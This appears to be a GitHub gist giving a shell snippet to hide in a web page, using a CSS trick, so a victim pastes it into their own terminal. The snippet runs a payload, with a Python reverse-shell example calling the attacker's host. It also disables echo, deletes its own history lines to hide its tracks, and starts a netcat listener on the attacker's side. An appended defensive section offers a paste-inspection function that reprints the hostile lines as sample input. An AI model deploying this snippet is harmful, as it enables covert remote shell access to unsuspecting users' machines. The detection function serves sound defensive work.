@dlanner
Last active January 27, 2017 17:33
Fairly stealthily trick a victim into copying/pasting a payload onto their own system and then hide your tracks. Based on hidden CSS trick from https://lifepluslinux.blogspot.com/2017/01/look-before-you-paste-from-website-to.html
# Hide this code in HTML that will be copied/pasted using hidden CSS trick from https://lifepluslinux.blogspot.com/2017/01/look-before-you-paste-from-website-to.html
# It will execute the payload, and then erase its own lines from both the terminal screen and history (with the current exception of the first line, which will successfully be removed from history, but remain on the screen; still researching how to solve this.)
# $PAYLOAD can be a reverse shell like from here http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
# Example:
# python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$YOUR_HOST",$YOUR_PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
stty -echo
(eval "$PAYLOAD" & ) && echo -e "\r"
history -w && LINE_NUM=$(history | tail -1 | awk -F ' ' '{print $1}' | xargs) && history -d $((LINE_NUM - 1)) && history -d $((LINE_NUM - 1)) && history -d $((LINE_NUM - 2)) && echo -e "\r" && stty echo && echo -e "\r"
# On your host
nc -l $YOUR_PORT -vvv
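
Seen from the defending side, the snippet above leaves recognizable markers in the clipboard text itself. The following is an added example, not part of the original gist: a shell function that inspects text before it is pasted and reports the indicators this gist relies on. The names `paste_check` and `sample_paste` are hypothetical and the sample input is constructed.

```bash
#!/usr/bin/env bash
# Added defensive example; not part of the original gist.
# paste_check reads text that is about to be pasted into a shell on stdin,
# prints each indicator it finds, and returns 1 if any matched.
paste_check() (
  text=$(cat)
  findings=0
  flag() { printf 'suspicious: %s\n' "$1"; findings=$((findings + 1)); }
  has() { printf '%s\n' "$text" | grep -Eq -- "$1"; }

  # Every embedded newline executes a command the moment the text is pasted.
  lines=$(printf '%s\n' "$text" | grep -c '')
  if [ "$lines" -gt 1 ]; then flag "multi-line paste ($lines lines)"; fi
  # Echo is switched off so the following commands do not appear on screen.
  if has 'stty[[:space:]]+-echo'; then flag 'terminal echo disabled (stty -echo)'; fi
  # History entries are deleted or the history list is cleared.
  if has 'history[[:space:]]+-[dc]'; then flag 'shell history modified (history -d/-c)'; fi
  # A variable or string is evaluated as code.
  if has '(^|[^[:alnum:]_])eval[[:space:]]'; then flag 'eval of a string'; fi
  # A job is backgrounded inside a subshell, away from the visible command line.
  if has '&[[:space:]]*\)'; then flag 'backgrounded subshell ( ... & )'; fi
  # Carriage returns are echoed to overwrite what is on the current line.
  if has 'echo[[:space:]]+-e.*\\r'; then flag 'carriage-return overwrite (echo -e "\r")'; fi

  [ "$findings" -eq 0 ]
)

# Constructed sample: what the clipboard holds when a page displays only "ls -la"
# but hides extra lines with CSS. $PAYLOAD stays an unexpanded placeholder.
sample_paste() {
  cat <<'EOF'
ls -la
stty -echo
(eval "$PAYLOAD" & ) && echo -e "\r"
history -d 10 && stty echo
EOF
}

sample_paste | paste_check || echo 'Do not paste this into a shell.'
```

To check the real clipboard, pipe it in, for example `xclip -o -selection clipboard | paste_check` on X11 or `pbpaste | paste_check` on macOS. Setting `set enable-bracketed-paste on` in `~/.inputrc` additionally stops readline from executing pasted newlines before you have seen the text.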